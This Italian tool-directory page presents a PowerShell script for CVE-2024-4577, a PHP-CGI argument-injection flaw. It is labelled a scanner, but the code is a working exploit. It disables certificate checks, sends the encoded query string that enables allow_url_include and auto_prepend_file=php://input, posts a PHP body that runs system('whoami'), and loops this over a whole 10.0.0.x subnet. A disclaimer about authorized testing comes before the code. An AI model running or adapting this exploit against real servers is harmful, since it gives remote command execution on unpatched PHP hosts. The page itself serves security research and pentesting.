Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-4577_PowerShell — Utilizza PowsrShell per scansionare CVE-2024-4577 | Kitploit
Strumenti/GitHubGitHub/tntrock/cve-2024-4577_powershell
RicognizioneScanner di VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubtntrock/cve-2024-4577_powershell

CVE-2024-4577_PowerShell

Utilizza PowsrShell per scansionare CVE-2024-4577

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-4577_PowerShell

Attenzione:
Assicurati di essere autorizzato a eseguire questo tipo di test di penetrazione nell'ambiente target; l'uso non autorizzato di tecniche di attacco potrebbe violare le leggi vigenti.
Il programma è fornito esclusivamente a scopo educativo e di ricerca; usalo esclusivamente in modo legale ed etico.
Se non conosci le possibili conseguenze dei test di penetrazione, ti consigliamo di rivolgerti a esperti di red team per eseguire i test.

Descrizione

Per iniziare, imposta il codice per ignorare la verifica dei certificati web

root@kitploit:~
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

Payload di attacco principale

root@kitploit:~
$url = "${Protocol}://$IP/php-cgi/php-cgi.exe?%add+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0"
$body = "<?php system('whoami'); die(); ?>"

Racchiudilo in una funzione e invialo tramite il cmdlet Invoke-WebRequest integrato di PowerShell (puoi regolare l'impostazione TimeoutSec a piacimento)

root@kitploit:~
function Invoke-RequestForIP {
    param (
        [string]$IP,
        [string]$Protocol
    )
    $url = "${Protocol}://$IP/php-cgi/php-cgi.exe?%add+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0"
    $body = "<?php system('whoami'); die(); ?>"
    try {
        $response = Invoke-WebRequest -Uri $url -Method Post -Body $body -UseBasicParsing -TimeoutSec 2
        return $response.Content
    } catch {
        return $_.Exception.Message
    }
}

Tramite un ciclo, esegui la scansione di 10.0.0.1 ~ 10.0.0.255

root@kitploit:~
$baseIP = "10.0.0."
$start = 1
$end = 255

for ($i = $start; $i -le $end; $i++) {
    $currentIP = $baseIP + $i
    foreach ($protocol in @("http", "https")) {
        $result = Invoke-RequestForIP -IP $currentIP -Protocol $protocol
        Write-Output "IP: $currentIP, Protocol: $protocol, Result: $result"
    }
}

Riferimenti

https://devco.re/blog/2024/06/06/security-alert-cve-2024-4577-php-cgi-argument-injection-vulnerability
https://nvd.nist.gov/vuln/detail/cve-2024-4577

Scarica lo strumento